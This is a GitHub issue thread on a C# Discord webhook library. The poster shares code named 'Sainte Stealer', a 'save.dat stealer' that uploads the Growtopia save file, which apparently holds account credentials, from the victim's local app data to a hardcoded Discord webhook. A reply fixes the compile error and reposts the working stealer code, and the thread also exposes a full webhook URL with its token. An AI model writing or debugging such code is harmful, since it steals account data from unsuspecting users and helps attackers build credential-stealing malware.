### ISSUE TITLE
CS0200	Property or indexer 'DiscordMessage.Embeds' cannot be assigned to -- it is read only

### ISSUE THREAD

**Issue by voidnullptr** [N4T4NM/CSharpDiscordWebhook#26]
**THIS IS MY CODE**
Idk why Im getting the error

using CSharpDiscordWebhook.NET.Discord;
using System.Drawing;

DiscordWebhook hook = new DiscordWebhook();
hook.Uri = new Uri("https://discord.com/api/webhooks/1069621354871148564/moFgj7WQh6EiiVCibJGDYVGCUcdR1y5MX4VrDnkPPaXD-RhEhD69-aI-MXpZDgm-EUJq");

DiscordMessage message = new DiscordMessage();
message.Content = "<@1067072299536228496>";
message.TTS = true; //read message to everyone on the channel
message.Username = "Sainte Stealer";

DiscordEmbed embed = new DiscordEmbed();
embed.Title = "Sainte Stealer";
embed.Description = "save.dat stealer";
embed.Timestamp = new DiscordTimestamp(DateTime.Now);
embed.Color = new DiscordColor(Color.Blue);

embed.Fields = new List<EmbedField>();
embed.Fields.Add(new EmbedField() { Name = "a", Value = "a", Inline = true });
embed.Fields.Add(new EmbedField() { Name = "a", Value = "a", Inline = true });

message.Embeds = new List<DiscordEmbed>();
message.Embeds.Add(embed);

await hook.SendAsync(message, new FileInfo("%localappdata%/Growtopia/save.dat"));

**Comment by MrNatanael** [comment]
You can't use `message.Embeds = new List()` because it's read-only, using `message.Embeds.Add` should work by default.

```
DiscordMessage message = new DiscordMessage();
message.Content = "<@1067072299536228496>";
message.TTS = true; //read message to everyone on the channel
message.Username = "Sainte Stealer";

DiscordEmbed embed = new DiscordEmbed();
embed.Title = "Sainte Stealer";
embed.Description = "save.dat stealer";
embed.Timestamp = new DiscordTimestamp(DateTime.Now);
embed.Color = new DiscordColor(Color.Blue);

embed.Fields.Add(new EmbedField() { Name = "a", Value = "a", Inline = true });
embed.Fields.Add(new EmbedField() { Name = "a", Value = "a", Inline = true });

message.Embeds.Add(embed);

await hook.SendAsync(message, new FileInfo("%localappdata%/Growtopia/save.dat"));
```
